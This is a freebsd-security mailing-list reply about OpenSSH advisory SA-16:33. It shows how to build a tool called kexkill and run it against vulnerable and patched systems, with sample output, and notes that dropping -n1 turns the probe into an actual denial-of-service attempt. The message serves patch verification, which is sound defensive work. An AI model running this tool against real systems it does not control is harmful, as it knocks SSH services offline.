Date: Sun, 06 Nov 2016 15:59:38 +0100
From: Dag-Erling Smørgrav <des@des.no>
To: Xin LI <delphij@gmail.com>
Cc: Vladimir Terziev <Vladimir.Terziev@bwinparty.com>, "<freebsd-security@freebsd.org>" <freebsd-security@freebsd.org>, Gregory Orange <gregory.orange@calorieking.com>
Subject: Re: FreeBSD Security Advisory FreeBSD-SA-16:33.openssh
Message-ID: <86vaw0irhh.fsf@desk.des.no>
In-Reply-To: <CAGMYy3t%2B-dZiFEDLEznTFHzHzRnk9-=AyqcqJ7L1BoMQ01HOAg@mail.gmail.com> (Xin LI's message of "Fri, 4 Nov 2016 10:08:05 -0700")
References: <20161102075533.8BBA114B5@freefall.freebsd.org>
 <201611021357.uA2DvHMW003088@higson.cam.lispworks.com>
 <CA%2B7WWSc%2B_Jjf%2BStVb2n367%2B7YSCw-RnGMTbT4nbaE88d_n57%2Bg@mail.gmail.com>
 <b8dcb2aa-4149-89ad-e519-8ce68922d0a8@FreeBSD.org>
 <24ff198d-9bd2-9842-50d8-8a1d5e2ecf8a@FreeBSD.org>
 <79b7122f-3b1a-377f-42bf-bd2851c5e6ae@calorieking.com>
 <97DEB29F-E625-4A74-9E1A-BC2A220DCF5A@bwinparty.com>
 <CAGMYy3t%2B-dZiFEDLEznTFHzHzRnk9-=AyqcqJ7L1BoMQ01HOAg@mail.gmail.com>

Xin LI <delphij@gmail.com> writes:
> We will investigate if the statement is true and will issue patches
> for earlier FreeBSD releases, if they are confirmed to be affected.

Hoping to make your life a little easier:

    $ git clone https://github.com/dag-erling/kexkill
    $ cd kexkill
    $ ./autogen.sh && ./configure && make

vulnerable 12.0 system:

    $ ./src/kexkill -v -n1 target |& grep -v "sending kexinit"
    kexkill: [03] connected
    kexkill: [03] got banner: SSH-2.0-OpenSSH_7.2 FreeBSD-20160310
    kexkill: [03] sending banner
    kexkill: [03] received kexinit
    [no more output]
    ^C

same system after applying SA-16:33:

    $ ./src/kexkill -v -n1 target |& grep -v "sending kexinit"
    kexkill: [03] connected
    kexkill: [03] got banner: SSH-2.0-OpenSSH_7.2 FreeBSD-20160310
    kexkill: [03] sending banner
    kexkill: [03] received kexinit
    kexkill: [03] read(): Connection reset by peer
    kexkill: [03] connected
    kexkill: [03] got banner: SSH-2.0-OpenSSH_7.2 FreeBSD-20160310
    kexkill: [03] sending banner
    kexkill: [03] received kexinit
    kexkill: [03] write(): Broken pipe
    kexkill: [03] connected
    kexkill: [03] got banner: SSH-2.0-OpenSSH_7.2 FreeBSD-20160310
    kexkill: [03] sending banner
    kexkill: [03] received kexinit
    kexkill: [03] read(): Connection reset by peer
    [...]
    ^C

Remove -n1 to actually (attempt to) attack the system rather than just
probe it.

DES
-- 
Dag-Erling Smørgrav - des@des.no